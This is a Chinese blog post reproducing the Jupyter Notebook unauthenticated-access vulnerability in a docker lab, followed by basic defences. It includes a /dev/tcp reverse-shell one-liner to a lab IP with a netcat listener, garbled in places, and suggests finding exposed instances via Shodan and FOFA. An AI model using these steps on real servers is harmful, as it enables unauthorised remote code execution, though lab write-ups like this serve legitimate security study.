漏洞复现----25、Jupyter Notebook 未授权访问漏洞

已于 2022-05-30 15:34:33 修改
阅读量2.2k 收藏 5
点赞数
分类专栏: # 漏洞复现 网络安全技术 文章标签: 未授权访问
于 2021-07-09 15:30:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sycamorelg/article/details/118605337
版权

文章目录

Jupyter Notebook 未授权访问漏洞

Jupyter Notebook(此前被称为 IPython notebook)是基于网页的用于交互计算的应用程序,是一个交互式笔记本,支持运行 40 多种编程语言。Jupyter Notebook是以网页的形式打开,可以在网页页面中直接编写代码和运行代码,代码的运行结果也会直接在代码块下显示。

如果管理员未为Jupyter Notebook配置密码,将导致未授权访问漏洞,游客可在其中创建一个console并执行任意Python代码和命令。

一、运行环境

docker-compose up -d
访问:ip:8888

二、漏洞复现

在shadan和FOFA等网络空间搜索引擎中搜索,可发现大量使用Jupyter Notebook的系统。
在这里插入图片描述
1、直接访问http://192.168.209.138:8888,并没有进行身份校验,未授权可以直接访问。
2、利用Terminal可以直接执行系统命令
在这里插入图片描述
在这里插入图片描述
3、

在命令行执行:bahs -i > &/dev/tcp/192.168.209.128/44444 0>&1。
监听机器执行:nc -lvvp 4444

在这里插入图片描述

在这里插入图片描述

三、漏洞防御

1、开启身份验证, 防止止未经授权用用户访问
2、访问控制策略略, 限制IP访问, 绑定固定IP

李沉肩
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
Jupyter Notebook 授权访问远程命令执行漏洞
失心少年
08-06 1025
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。笔记本可以包含代码、注释、图表、公式和可运行的代码块。Jupyter是一个开源的交互式计算环境,它支持多种编程语言,包括Python、R、Julia等。如果管理员Jupyter Notebook配置密码,将导致授权访问漏洞,游客可在其中创建一个console并执行任意Python代码和命令。
漏洞复现Jupyter Notebook授权访问到RCE
Fly_鹏程万里
06-20 194
Jupyter Notebook(此前被称为IPython notebook)是一个交互式笔记本,支持运行40多种编程语言,Jupyter Notebook的本质是一个Web应用程序,便于创建和共享程序文档,支持实时代码,数学方程,可视化和 markdown,如果管理员Jupyter Notebook配置密码将导致授权访问漏洞,游客可在其中创建一个console并执行任意Python代码和命令。
Jupyter NoteBook授权访问漏洞
最新发布
weixin_53736204的博客
08-04 272
Jupyter Notebook(此前被称为 IPython notebook)是一个交互式笔记本,支持运行 40多种编程语言。如果管理员Jupyter Notebook配置密码,将导致授权访问漏洞,游客可在其中创建一个console并执行任意Python代码和命令,默认端口:8888。
Jupyter Notebook 授权访问漏洞
weixin_51387754的博客
11-09 692
漏洞原理 Jupyter Notebook(此前被称为 IPython notebook)是一个交互式笔记本,支持运行 40 多种编程语言。 如果管理员Jupyter Notebook配置密码,将导致授权访问漏洞,游客可在其中创建一个console并执行任意Python代码和命令。 漏洞复现 使用vulhub进入目录 (root????guiltyfet)-[/home/guiltyfet/vulhub] └─# cd jupyter
授权访问Jupyter Notebook 授权访问漏洞
qq_68163788的博客
05-21 741
Jupyter Notebook(此前被称为 IPython notebook)是一个交互式笔记本,支持运行 40 多种编程语言。 如果管理员Jupyter Notebook配置密码,将导致授权访问漏洞,游客可在其中创建一个console并执行任意Python代码和命令。
Jupyter Notebook 授权访问漏洞总结
qq_45746681的博客
10-05 1918
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、Jupyter Notebook 授权访问漏洞是什么?二、复现1.搭建环境漏洞利用三、防御方法 前言 记录并自己复现下常见的授权访问漏洞 一、Jupyter Notebook 授权访问漏洞是什么? Jupyter Notebook(此前被称为 IPython notebook)是一个交互式笔记本,支持运行 40 多种编程语言。 如果管理员Jupyter Notebook配置密码,将导致授权访问漏洞,游客可在其中
记录一次vulhub:Jupyter Notebook 授权访问漏洞复现
sszsNo1的博客
06-27 540
复现vulhub:Jupyter Notebook 授权访问漏洞
利用Vulnhub复现漏洞 - Jupyter Notebook 授权访问漏洞
JiangBuLiu的博客
07-12 2214
Jupyter Notebook 授权访问漏洞Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现我滴个神呀 Vulnhub官方复现教程 https://vulhub.org/#/environments/jupyter/notebook-rce/ 漏洞原理 Jupyter Notebook(此前被称为 IPython notebook)是一个交互式笔记本,支持运行 40 多种编程语言。 ...
jh-custom-init-sample:使用值查找演示自定义jupyterhub配置初始化的示例
02-15
jh-custom-init-sample 通过值查找演示自定义jupyterhub配置初始化的示例 先决条件 minikube必须正在运行 必须有一个名为jhub的命名空间 脚步 构建容器: ./build.sh 部署jupyterhub: ./setup.sh 完成后: ./destroy.sh 笔记 在此示例中,我们基于jupyterhub / k8s-hub映像创建了一个docker映像。 我们添加了一个名为mck_init的python模块,该模块将重写所需的设置。 我们从传递给jupyterhub掌舵表的config.yaml中调用该模块。 config.yaml中的景点 图像 这是我们建造的。 extraConfig 初始化python的自定义位。 我们正在调用我们的mck_init模块。 login_service / client_secret 这表明价值替代
CVE-2018-14418 擦出新火花
weixin_30663391的博客
09-11 1078
笔者《Qftm》原文发布:https://xz.aliyun.com/t/6223 0x00 前言 最近,一次授权的渗透测试项目意外的撞出了(CVE-2018-14418)新的火花,在这里分享给大家,同时简单记录一下自己的渗透测试过程,一些敏感信息已打码,相关漏洞已报送厂商修复。 0x01 Msvod Cms SQL注入漏洞原始 详解 漏洞ID 1226187 漏洞类型 SQL注入...
jupyter-notebook 命令执行 (CVE-2019-9644)漏洞复现
weixin_42675091的博客
09-23 1325
jupyter-notebook 命令执行 (CVE-2019-9644)漏洞复现
漏洞复现-jupyter_notebook-命令执行】vulfocus/jupyter_notebook-cve_2019_9644
10-24 1892
jupyter_notebook-命令执行】功能点
八、【漏洞复现jupyter-notebook 命令执行(CVE-2019-9644)
weixin_52351575的博客
09-21 508
Jupyter Notebook是一套用于创建、共享代码和说明性文本文档的开源Web应用程序。(可能出现的问题:terminal无法打开,也就是一个空白页面【过几天再重启靶场就是好的了】)Jupyter Notebook可直接使用命令行执行任意命令。打开控制台进行命令输入​指令,这里我们输入ls /tmp。点击new---->terminal。2.网站图标 jupyter。(这种情况基本上很难遇到)授权开启终端权限的系统。1.有主页与明显logo。3.指纹识别工具探测。
Web渗透-jupyter notebook授权访问
qq_45066095的博客
01-03 429
jupyter notebook授权访问 漏洞描述 Jupyter Notebook(此前被称为 IPython notebook)是一个交互式笔记本,支持运行 40 多种编程语言。 如果管理员Jupyter Notebook配置密码,将导致授权访问漏洞,游客可在其中创建一个console并执行任意Python代码和命令。 漏洞复现 1.用BUUOJ上的Real环境复现,网站地址: https://buuoj.cn/login?next=%2Fchallenges%3F 2.点击后复制地址进行访问
输入jupyter notebook --generate-config命令运行后jupyter notebook打不开了怎么办
05-31
运行`jupyter notebook --generate-config`命令会生成jupyter的配置文件,但不会影响jupyter的正常运行。如果您在运行该命令后无法打开jupyter notebook,请检查是否有其他错误提示或者尝试以下解决方法: 1. 检查是否输入了正确的命令,可以尝试重新输入`jupyter notebook`命令启动jupyter。 2. 检查是否在正确的目录下启动jupyter notebook,可以尝试进入其他目录再次启动jupyter。 3. 检查是否有其他程序占用了jupyter的端口号,可以尝试更改端口号再次启动jupyter,例如`jupyter notebook --port 8889`。 如果以上方法均无法解决问题,可以提供更多详细信息,我会尽力帮助您解决问题。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

李沉肩

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值